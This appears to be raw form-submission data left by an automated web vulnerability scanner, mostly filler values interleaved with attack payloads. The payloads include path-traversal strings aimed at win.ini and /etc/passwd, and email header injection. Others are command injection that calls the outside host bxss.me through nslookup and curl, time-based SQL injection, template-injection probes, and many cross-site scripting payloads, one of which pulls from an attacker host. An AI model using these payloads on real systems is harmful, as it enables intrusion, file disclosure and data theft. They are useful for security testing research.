unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
1
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
Mr.
1
Mr.
1
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
1
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
1
Mr.
1
Mr.
1
Mr.
Mr.
1
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
1
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
1
Mr.
1
Mr.
1
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
1
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
1
Mr.
Mr.
1
Mr.
1
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
..\..\..\..\..\..\..\..\windows\win.ini
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
to@example.com>%0d%0abcc:009247.60685-6529.60685.0fa6a.19899.2@bxss.me
Mr.
1
Mr.
1
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
to@example.com>%0d%0abcc:009247.60685-6527.60685.0fa6a.19899.2@bxss.me
Mr.
1
Mr.
1
Mr.
/../../../../../../../../../../boot.ini
1
/../../../../../../../../../../boot.ini
1
Mr.
1
Mr.
1
../../../../../../../../../../windows/win.ini%00.
1
Mr.
1
Mr.
1
Mr.
1%0abcc:009247.60685-6526.60685.0fa6a.19899.2@bxss.me
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
C:\WINDOWS\system32\drivers\etc\hosts
1
C:\WINDOWS\system32\drivers\etc\hosts
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1&n950126=v975488
Mr.
1
Mr.
1
./Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
../Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.&n994973=v982972
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
file:///etc/passwd
1
file:///etc/passwd
1
Mr.
1
Mr.
1
Mr.
1
../../../../../../../../../../../../../../windows/win.ini
1
to@example.com>%0d%0abcc:009247.60685-6521.60685.0fa6a.19899.2@bxss.me
1
to@example.com>%0d%0abcc:009247.60685-6521.60685.0fa6a.19899.2@bxss.me
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
../../../../../../../../../../../../../../etc/passwd
1
Mr.
1
Mr.%0abcc:009247.60685-6520.60685.0fa6a.19899.2@bxss.me
1
Mr.%0abcc:009247.60685-6520.60685.0fa6a.19899.2@bxss.me
1
Mr.
1
Mr.
1
Mr.
"+response.write(9190780*9142042)+"
;(nslookup -q=cname hitwzkipgypfpdcb2d.bxss.me||curl hitwzkipgypfpdcb2d.bxss.me)|(nslookup -q=cname hitwzkipgypfpdcb2d.bxss.me||curl hitwzkipgypfpdcb2d.bxss.me)&(nslookup -q=cname hitwzkipgypfpdcb2d.bxss.me||curl hitwzkipgypfpdcb2d.bxss.me)
1
;(nslookup -q=cname hitwzkipgypfpdcb2d.bxss.me||curl hitwzkipgypfpdcb2d.bxss.me)|(nslookup -q=cname hitwzkipgypfpdcb2d.bxss.me||curl hitwzkipgypfpdcb2d.bxss.me)&(nslookup -q=cname hitwzkipgypfpdcb2d.bxss.me||curl hitwzkipgypfpdcb2d.bxss.me)
1
Mr.
1
Mr.
1
`(nslookup -q=cname hitdzbsrtkawa95fd5.bxss.me||curl hitdzbsrtkawa95fd5.bxss.me)`
1
`(nslookup -q=cname hitdzbsrtkawa95fd5.bxss.me||curl hitdzbsrtkawa95fd5.bxss.me)`
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
|(nslookup -q=cname hitxnsacncyhu36232.bxss.me||curl hitxnsacncyhu36232.bxss.me)
1
Mr.
1
Mr.
'+response.write(9190780*9142042)+'
Mr.
1
Mr.
response.write(9190780*9142042)
&(nslookup -q=cname hitahbgzogprf14bb1.bxss.me||curl hitahbgzogprf14bb1.bxss.me)&'\"`0&(nslookup -q=cname hitahbgzogprf14bb1.bxss.me||curl hitahbgzogprf14bb1.bxss.me)&`'
1
&(nslookup -q=cname hitahbgzogprf14bb1.bxss.me||curl hitahbgzogprf14bb1.bxss.me)&'\"`0&(nslookup -q=cname hitahbgzogprf14bb1.bxss.me||curl hitahbgzogprf14bb1.bxss.me)&`'
1
Mr.
1
Mr.
1
&nslookup -q=cname hitmcjjvsogac2e44f.bxss.me&'\"`0&nslookup -q=cname hitmcjjvsogac2e44f.bxss.me&`'
1
Mr.
1
Mr.
bxss.me/t/xss.html?%00
Mr.
1
Mr.
1
Mr.
'+'A'.concat(70-3).concat(22*4).concat(97).concat(67).concat(108).concat(79)+(require'socket'
Socket.gethostbyname('hitkb'+'uqhzweyrd886c.bxss.me.')[3].to_s)+'
Mr.
1
Mr.
1
Mr.
HttP://bxss.me/t/xss.html?%00
Mr.
Mr.
1
$(nslookup -q=cname hitjrlmjspbawafe6b.bxss.me||curl hitjrlmjspbawafe6b.bxss.me)
1
Mr.
bxss.me/t/xss.html?%00
Mr.
Mr.
1
Mr.
1
Mr.
1
(nslookup -q=cname hitenhomuhvzsdb7e9.bxss.me||curl hitenhomuhvzsdb7e9.bxss.me))
1
(nslookup -q=cname hitenhomuhvzsdb7e9.bxss.me||curl hitenhomuhvzsdb7e9.bxss.me))
1
Mr.
Mr.
"+"A".concat(70-3).concat(22*4).concat(105).concat(78).concat(117).concat(69)+(require"socket"
Socket.gethostbyname("hitpe"+"mqhedfol6755e.bxss.me.")[3].to_s)+"
Mr.
1
Mr.
1
Mr.
1
Mr.
HttP://bxss.me/t/xss.html?%00
Mr.
1
Mr.
/../../../../../../../../../../windows/system32/BITSADMIN.exe
|echo ecixkc$()\ kopgdx\nz^xyu||a #' |echo ecixkc$()\ kopgdx\nz^xyu||a #|" |echo ecixkc$()\ kopgdx\nz^xyu||a #
1
|echo ecixkc$()\ kopgdx\nz^xyu||a #' |echo ecixkc$()\ kopgdx\nz^xyu||a #|" |echo ecixkc$()\ kopgdx\nz^xyu||a #
1
Mr.
1
Mr.
1
Mr.
1
Mr.
&echo njazzj$()\ qkswbw\nz^xyu||a #' &echo njazzj$()\ qkswbw\nz^xyu||a #|" &echo njazzj$()\ qkswbw\nz^xyu||a #
1
Mr.
/../../../../../../../../../../windows/system32/BITSADMIN.exe
Mr.
1
Mr.
1
Mr.
1
Mr.
Mr.
1
Mr.
khLvqu4h
Mr.
1
echo gtoonq$()\ wbnlvm\nz^xyu||a #' &echo gtoonq$()\ wbnlvm\nz^xyu||a #|" &echo gtoonq$()\ wbnlvm\nz^xyu||a #
1
"+response.write(9892150*9320948)+"
1
"+response.write(9892150*9320948)+"
1
Mr.
1
'+'A'.concat(70-3).concat(22*4).concat(119).concat(69).concat(122).concat(88)+(require'socket'
1
'+response.write(9892150*9320948)+'
1
'+response.write(9892150*9320948)+'
1
/../../../../../../../../../../windows/system32/BITSADMIN.exe
1
response.write(9892150*9320948)
1
bxss.me/t/xss.html?%00
1
tFPg0amT
1
tFPg0amT
1
"+"A".concat(70-3).concat(22*4).concat(104).concat(82).concat(122).concat(76)+(require"socket"
1
HttP://bxss.me/t/xss.html?%00
1
Mr.
1
Mr.
1
1<InvalidTag
1<InvalidTag>cAZQ(9539)</script>9539
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%75%54%50%78%28%39%33%36%36%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1<InvalidTag>cAZQ(9831)</script>
1<InvalidTag>uTPx(9919)</script>9919
1<W4KNQJ>VUXG0[!+!]</W4KNQJ>
1<InvalidTag>uTPx(9549)</script>
1<InvalidTag >cAZQ(9514)</ScRiPt>
1<W1NJLO>WL0FQ[!+!]</W1NJLO>
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1<InvalidTag >uTPx(9986)</ScRiPt>
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
dfb__${98991*97996}__::.x
dfb[[${98991*97996}]]xca
dfb[[${98991*97996}]]xca
dfb{{98991*97996}}xca
dfb{{98991*97996}}xca
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
<th:t="${dfb}#foreach
<th:t="${dfb}#foreach
1
<%={{={@{#{${dfb}}%>
<%={{={@{#{${dfb}}%>
bfgx1434%C0%BEz1%C0%BCz2a%90bcxhjl1434
bfgx2628%C0%BEz1%C0%BCz2a%90bcxhjl2628
bfg7782%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl7782
bfg9084%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl9084
19690329
19110268
'"()&%<zzz><InvalidTag >cAZQ(9461)</ScRiPt>
'"()&%<zzz><InvalidTag >uTPx(9852)</ScRiPt>
1'"()&%<zzz><InvalidTag >cAZQ(9793)</ScRiPt>
1'"()&%<zzz><InvalidTag >uTPx(9291)</ScRiPt>
@@G0Wu6
����%2527%2522\'\"
'"
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1naI2qKWg')) OR 625=(SELECT 625 FROM PG_SLEEP(15))--
1VByuu6EA') OR 798=(SELECT 798 FROM PG_SLEEP(15))--
1MQ8o6Rn0' OR 818=(SELECT 818 FROM PG_SLEEP(15))--
1-1)) OR 113=(SELECT 113 FROM PG_SLEEP(15))--
1-1) OR 469=(SELECT 469 FROM PG_SLEEP(15))--
1-1 OR 667=(SELECT 667 FROM PG_SLEEP(15))--
1lPBlcoQu')); waitfor delay '0:0:15' --
1Tm0fmX47'); waitfor delay '0:0:15' --
19u97QGfN'; waitfor delay '0:0:15' --
1-1 waitfor delay '0:0:15' --
1-1)); waitfor delay '0:0:15' --
1-1); waitfor delay '0:0:15' --
1-1; waitfor delay '0:0:15' --
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
1*if(now()=sysdate(),sleep(15),0)
-1" OR 3*2>(0+5+175-175) --
-1" OR 3*2<(0+5+175-175) --
-1" OR 3+175-175-1=0+0+0+1 --
-1" OR 2+175-175-1=0+0+0+1 --
-1' OR 3*2>(0+5+954-954) or 'aRz9d7aC'='
-1' OR 3*2<(0+5+954-954) or 'aRz9d7aC'='
-1' OR 3+954-954-1=0+0+0+1 or 'aRz9d7aC'='
-1' OR 2+954-954-1=0+0+0+1 or 'aRz9d7aC'='
-1' OR 3*2>(0+5+723-723) --
-1' OR 3*2<(0+5+723-723) --
-1' OR 3+723-723-1=0+0+0+1 --
-1' OR 2+723-723-1=0+0+0+1 --
-1 OR 3*2>(0+5+571-571)
-1 OR 3*2<(0+5+571-571)
-1 OR 3+571-571-1=0+0+0+1
-1 OR 2+571-571-1=0+0+0+1
-1 OR 3*2>(0+5+806-806) --
-1 OR 3*2<(0+5+806-806) --
-1 OR 3+806-806-1=0+0+0+1 --
-1 OR 2+806-806-1=0+0+0+1 --
1
1
Mr.
555
Mr.
555
1<aO2Q5on<
1<img sRc='http://attacker-9620/log.php?
1<aOXyFKr x=9456>
1<ifRAme sRc=9961.com></IfRamE>
1<W2MJ4T>41TWI[!+!]</W2MJ4T>
11ASaN
<InvalidTag >Zbps(9907)</ScRiPt>
1}body{zzz:Expre/**/SSion(Zbps(9354))}
<a HrEF=jaVaScRiPT:>
<a HrEF=http://xss.bxss.me></a>
1<input autofocus onfocus=Zbps(9552)>
�<img zzz onmouseover=Zbps(90461) //�>
1<ScRiPt>Zbps(9403)</sCripT>
1\u003CScRiPt\Zbps(9124)\u003C/sCripT\u003E
%31%3C%53%63%52%69%50%74%20%3E%5A%62%70%73%289593%29%3C%2F%73%43%72%69%70%54%3E
1<img/src=">" onerror=alert(9395)>
1<img src=xyz OnErRor=Zbps(9788)>
1<img src=//xss.bxss.me/t/dot.gif onload=Zbps(9492)>
1<body onload=Zbps(9614)>
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9445'>
1<isindex type=image src=1 onerror=Zbps(9944)>
1<svg
� onload=Zbps(9888);>
1<InvalidTag
>Zbps(9165)</ScRiPt>
1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9971></ScRiPt>
1<InvalidTag
>Zbps(9847)</ScRiPt>
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%5A%62%70%73%28%39%39%39%37%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
@@5HVxu
1<InvalidTag>Zbps(9750)</script>9750
����%2527%2522\'\"
1<InvalidTag>Zbps(9091)</script>
'"
1<WX9YQF>STVT1[!+!]</WX9YQF>
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
